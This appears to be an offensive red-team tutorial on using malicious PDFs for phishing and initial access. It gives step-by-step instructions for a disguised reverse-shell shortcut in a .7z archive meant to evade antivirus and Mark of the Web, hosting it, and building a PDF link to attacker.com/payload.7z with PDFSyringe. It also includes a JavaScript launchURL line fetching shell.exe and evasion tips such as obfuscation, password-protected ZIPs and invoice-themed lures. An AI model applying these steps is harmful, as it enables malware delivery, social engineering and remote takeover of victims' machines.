Type: Malicious Documents & File-Based Delivery
Platform: Windows, macOS, Linux (PDF Reader or browser-dependent)
Prerequisites: User must open the PDF file in a vulnerable or misconfigured PDF reader (e.g., Adobe Reader with JavaScript enabled) for Code Execution
Malicious PDF files are widely used in phishing campaigns and red team operations for initial access. PDFs can embed JavaScript, launch actions, file attachments, and even execute external programs in some cases.
Attackers exploit JavaScript execution, action triggers, and vulnerabilities in PDF viewers (e.g., Adobe Reader CVE-2010-1240, CVE-2018-4990, CVE-2023-26369, CVE-2024-41869 ) to:
- Drop/Execute malware
- Execute commands (via vulnerable Adobe Acrobat Reader : CVE-2010-1240, CVE-2018-4990, CVE-2023-26369, CVE-2024-41869)
- Credential harvesting ( via JavaScript/Forms )
- The attacker creates a malicious PDF file.
- The PDF includes either :
- JavaScript code ( to drop malware or phish for credentials )
- exploit trigger (e.g : Adobe Acrobat : CVE-2010-1240, CVE-2018-4990, CVE-2023-26369, CVE-2024-41869)
- When the user opens the file, the embedded code is executed automatically or after user interaction, depending on the PDF reader's configuration.
Some PDF exploits do not require user interaction and trigger on open.
Tools Needed
msfvenomor other payload generator (optional)- pdf editor or a tool to generate a malicious pdf file e.g :
PDFSyringeorEvilPDF msfconsoleornc(for listening)
in most cases we will use PDFs to drop malware or harvest credentials ( with social engineering ), so i'll demonstrate how to leverage PDFs to drop malware on the target system ( and convince the victim to open the dropped malware )
- Create Payload (Reverse Shell)
we'll create a shortcut ( .lnk ) that execute our reverse shell and make it looks like a benign document , then we'll compress it into a .7z archive ( to evade av and evade windows Mark of the Web ).
so at the end we will have a 7-zip archive that contain our shortcut file and a pdf file to display to the victim ( to avoid raising suspicion )
- host the payload
use python to host the payload ( zip archive )
python -m http.server 80- Embed a URI to the remote payload
Use PDFSyringe to make a pdf file that has a clickable link to the payload
git clone https://github.com/o-sec/PDFSyringe
cd PDFSyringe
chmod +x pdfsyringe.py
./pdfsyringe.py -u http://attacker.com/payload.7z -t template.pdf -o document1.pdfThis generates a malicious pdf file with the embedded clickable URI to the payload.
- Deliver the PDF
- Send via email attachment with a social engineering lure
- Host on a web server (e.g., http://attacker.com/invoice.pdf)
- Execution
when the victim opens the PDF file will potentially fall for the social engineering lure and download the 7zip archive and extract it then hopefully open the stage2 payload, then we'll get a reverse shell :)
at the end of the day it depends on social engineering. but in some cases we could exploit vulnerabilities in pdf readers like : CVE-2010-1240, CVE-2018-4990, CVE-2023-26369, CVE-2024-41869
- JavaScript Trigger Inside PDF
app.launchURL("http://attacker.com/shell.exe", true);- alert with javascript
app.alert("hello !");- Rename the PDF to something enticing: Invoice_351.pdf
- Use password-protected ZIP to deliver the PDF if AV blocks it
- PDF readers vary in behavior, test on Adobe Reader and browser PDF viewers
- Use obfuscated JavaScript for stealth
- PDFSyringe
- CVE-2010-1297
- EvilPDF GitHub
- Threat-Loaded: Malicious PDFs Never Go Out of Style
- CVE-2010-1240: Adobe Reader and Acrobat arbitrary code execution
- PDF Malware Is Not Yet Dead
- CVE-2023-26369: Adobe Acrobat PDF Reader RCE when processing TTF fonts
- Beware of weaponized PDF
- Rise in Deceptive PDF: The Gateway to Malicious Payloads
- Can a PDF File be Malware? @john-hammond YOUTUBE
- The Weaponization of PDFs
Author : o-sec